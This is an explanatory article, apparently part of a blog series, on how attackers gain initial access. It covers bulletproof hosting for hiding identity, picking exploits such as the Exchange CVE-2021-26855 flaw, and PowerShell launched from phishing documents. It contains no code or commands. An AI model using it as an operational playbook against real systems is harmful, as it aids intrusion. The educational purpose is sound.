In the previous article on reconnaissance, I talked about how hackers survey their targets to figure out vulnerabilities.

Here, I will discuss once they know of potential vulnerabilities, how do they gain access to the target’s network? This part in of itself, is composed of detailed tasks.

Acquiring Infrastructures

First, what infrastructures does an attacker need in order to mount an attack campaign at a target? It is not enough that you know of a potential vulnerability for example; the target is using an older version of the Microsoft Exchange server, which has not been updated.

You can of course use your own personal computer to attempt to connect with the target, but you will be discovered when IT personnel take a look at the system logs. So how do hackers manage to obfuscate who they are, while at the same time making it look as if any incoming requests to connect are legitimate?

There are many ways of redirecting network traffic to hide the hacker’s identity. One way is through Bulletproof Hosting Services (BPHS). BPHS providers allow cybercriminals to host content that might be illegal in certain countries, and is extremely hard (if not impossible) to trace back to the cybercriminals themselves. BPHS providers charge anywhere from $2-$300 per month. In many cases, the hacker intentionally chooses the location of their servers to be different from the geolocation of their targets — making it harder to enforce legal punishments.

When thinking about hacking, focus is usually drawn to hackers, their employees, and the exploits they use. However, BPHS services are the bread and butter for many exploits. According to global cloud security provider Trend Micro,

“Without BPHS, many, if not all major cybercriminal groups would cease to operate.”

“The very nature of BPHSs is that they protect malicious activity against law enforcement, giving cybercriminals the much-needed loophole to wriggle out of and escape from the clutches of both law enforcement and the security industry. That loophole unfortunately largely remains open today.” — Robert McArdle, Trend Micro FTR Senior Manager in 2015"

Engineering the Exploit

Once you have acquired your infrastructure, you need to make some choices — what specific vulnerabilities will you exploit? Many times this is through websites that typically use certain dedicated ports (e.g. port 443 for https traffic). Other attacks exploit ports used for commonly used services include SQL, SSH, and SMB protocols. As I have shown in my previous article, if you know the IP address of your target, it is possible to obtain information about open ports which communicate to the larger Internet, as well as what services they run.

As an example, in the case of the recent Microsoft Exchange hacks, attackers first sent malicious requests to Exchange servers on port 443. They then exploited the CVE-2021–26855 vulnerability which allowed hackers to send arbitrary https requests and authenticate as the Exchange server without credentials! You can find the python code here!

Executing the Exploit

While one way for running an exploit is typing commands to each and every target and attempting to make a connection, this is not efficient — especially when you are dealing with hundreds or thousands of targets. Sometimes, for gaining initial access, you need to think about how the exploit should be executed without raising flags, as well as in a scalable and efficient manner.

One way is for hackers to make use of command and script interpreters like PowerShell on Windows. Adversaries can use interpreters for executing arbitrary commands such as downloading and running executables from the Internet.

In May 2017, FireEye discovered phishing emails that activates Windows PowerShell. This was done by exploiting a vulnerability wherein once a hacker opens an RTF word document, the document had links to download excel files. The excel files in turn contained commands to activate PowerShell. FireEye hadn’t yet observed any post-exploitation activity such as stealing of data, and so could not assess the goal of the campaign.

Conclusions

The stereotypical hacker is one single person, brilliantly coding away and penetrating the most secure defenses.

However, that is not always the case. If anything, I hope this article conveys that the hacking process requires an organizational mindset, and successful attacks require many different components to come together. Most of these components are not what you might think of as hacking, but are essential for successful cyberattack campaigns.

In getting the first foot through the door of their targets, hackers have to successfully coordinate multiple steps. First they need to identify potential vulnerabilities through reconnaissance. Next, they need to obtain Internet infrastructures — websites, domains, insecure devices so that they can connect and monitor targets without revealing who they are. For this, they sometimes use the services of bulletproof hosting services that do not reveal their clients identity for a certain service fee.

Next, they need to figure out which vulnerabilities to exploit. MITRE has a Common Vulnerabilities and Exposures (CVE) database which is a great reference for network security personnel to understand the exposure of their organizations and ultimately reduce the exposure. However, hackers can use the same database and target those organizations that have vulnerabilities that could be due to missed updates.

The final part of gaining initial access is exploitation. Armed with the knowledge and capability to gain unauthorized access, hackers can choose to execute in a number of different ways. One example is through sending mass emails, with malicious links. Once clicked, these activate common scripting software e.g. Windows PowerShell that the hackers can then use to communicate with the target.

This is still very much the beginning of the exploit. In the next few articles in this series, I’m going to discuss — what do hackers do now that they have initial access? How do they achieve their goals?